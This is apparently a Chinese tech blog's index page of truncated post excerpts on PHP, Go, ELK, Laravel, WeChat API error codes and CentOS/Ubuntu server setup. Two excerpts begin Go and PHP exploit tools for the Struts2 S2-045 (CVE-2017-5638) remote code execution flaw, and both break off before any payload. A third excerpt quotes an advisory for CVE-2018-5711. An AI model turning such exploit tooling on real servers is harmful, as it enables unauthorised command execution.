Author: Orange Tsai(@orange_8361) from DEVCORE
Recently, I reviewed several Web frameworks and language implementations, and found some vulnerabilities.
This is an simple and interesting case, and seems easy to exploit in real world!
Affected
All PHP version
PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1
Vulnerability Details
The vulnerability is on the file ext...
CVE-2018-5711, GD漏洞阅读全文
其实Struts2代码执行原理很简单, 再来一个golang版的 , 不用怀疑, 我写这么多版本其实就是用来搞笑的
package main
import (
"fmt"
"os"
"net/http"
"io/ioutil"
"strings"
)
func httpGet(url, commend string) (result string) {
var ret string
if "http" != substr(url, 0 , 4) {
url = "http://" + url
}
resp, err := http.Get(url)
if err != nil {
ret = "网站无法正常打开!"
}
defer resp.Body.Clo...
S2-045 for golang, Struts2爆远程代码执行漏洞阅读全文
/**
* Created by IntelliJ IDEA.
* User: jisec.com
* Date: 2017/3/7
* Time: 下午4:45
*/
function getContext($url, $content, $commend){
$ret = http_request($url, null, $commend);
printf($ret);
};
function http_request($url, $data = null, $commend = "whoami")
{
$curl = curl_init();
$header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,";
$header[0] .= "text/html;q=0.9,text...
CVE-2017-5638, S2-045阅读全文
Golang支持交叉编译,也就是说你在32位平台的机器上开发,可以编译生成64位平台上的可执行程序.mac 下可以编译linux 下的执行程序 又或者windows下的执行程序
交叉编译依赖下面几个环境变量:
$GOARCH 目标平台(编译后的目标平台)的处理器架构(386、amd64、arm)
$GOOS 目标平台(编译后的目标平台)的操作系统(darwin、freebsd、linux、windows)
各平台的GOOS和GOARCH参考
OS ARCH ...
go, golang, Golang交叉编译, Golang跨平台阅读全文
ELK平台介绍
在搜索ELK资料的时候,发现这篇文章比较好,于是摘抄一小段:
以下内容来自:http://baidu.blog.51cto.com/71938/1676798
日志主要包括系统日志、应用程序日志和安全日志。系统运维和开发人员可以通过日志了解服务器软硬件信息、检查配置过程中的错误及错误发生的原因。经常分析日志可以了解服务器的负荷,性能安全性,从而及时采取措施纠正错误。
通常,日志被分散的储存不同的设备上。如果你管理数十上百台服务器...
ElasticSearch, ELK, Kibana, Logstash阅读全文
Laravel5.2的目录结构如下
app
Commands
Console
Events
Handlers
Commands
Events
Http
Controllers
Middleware
Requests
Providers
Services
bootstrap
config
database
migrations
seeds
public
package
resources
...
laravel5 laravel5.2阅读全文
抽了个时间把博客升级到最新的 Centos7 PHP7.0.6,Mysql5.7 Nginx1.10.0 版本, 使用七牛做CDN资源服务器, PHP版本从以前的php5.6升级PHP7.0.6 速度提升明显,经过前面几周的观察,稳定性不错
阅读全文
公众号每次调用接口时,可能获得正确或错误的返回码,开发者可以根据返回码信息调试接口,排查错误。
全局返回码说明如下
返回码
说明
-1
系统繁忙
0
请求成功
40001
获取access_token时AppSecret错误,或者access_token无效(可以重置试试)
40002
不合法的凭证类型
40003
不合法的OpenID
40004
不合法的媒体文件类型
40005
不合法的文件类型
40006
不合法的文件大小
40007
不合法的媒体文件id
40008
...
微信公众号, 微信公众号errcode阅读全文
php7编译安装phpredis扩展报一下错误的解决办法
hecking whether -lc should be explicitly linked in... no
checking dynamic linker characteristics... GNU/Linux ld.so
checking how to hardcode library paths into programs... immediate
checking whether stripping libraries is possible... yes
checking if libtool supports shared libraries... yes
checking whether to build shared libraries... yes
checking w...
php7-redis扩展, PHP安装phpredis报错阅读全文
配置防火墙,开启80端口、3306端口
CentOS 7.0默认使用的是firewall作为防火墙,这里改为iptables防火墙。
1、关闭firewall:
systemctl stop firewalld.service #停止firewall
systemctl disable firewalld.service #禁止firewall开机启动
2、安装iptables防火墙
yum install iptables-services #安装
vi /etc/sysconfig/iptables #编辑防火墙配置文件
# Firewall configuration written by system-config-firewall
# Manual ...
nginx1.10.0, PHP7阅读全文
添加第三方源
由于ubuntu各个版本目前都没有官方的PHP7.0的源,所以我们只能自己添加第三方的源
sudo add-apt-repository ppa:ondrej/php
更新源,安装PHP
添加源之后,我们需要更新源。然后正式开始安装PHP7.0
sudo apt-get update
sudo apt-get install php7.0
最后安装常用扩展
目前该第三方源已经提供了大部分常用的PHP扩展。但是需要注意的是,目前该源中的PHP扩展,部分是部分是根据PHP7重写的,部分是兼容模式的
PHP...
Php, php-memcache, PHP7, php7-redis, php7-redis扩展, PHP7.0, phpredis, redis扩展阅读全文
安装最新的php7.0.6在安装成功后运行 php -m 查看安装了哪些扩展 ,或者执行任意php命令报错
php -v
PHP Deprecated: PHP Startup: memcached.sess_lock_wait and memcached.sess_lock_max_wait are deprecated. Please update your configuration to use memcached.sess_lock_wait_min, memcached.sess_lock_wait_max and memcached.sess_lock_retries in Unknown on line 0
Deprecated: PHP Startup: memcached.sess_lock_wa...
Deprecated: PHP Startup, PHP7, PHP7.0.6阅读全文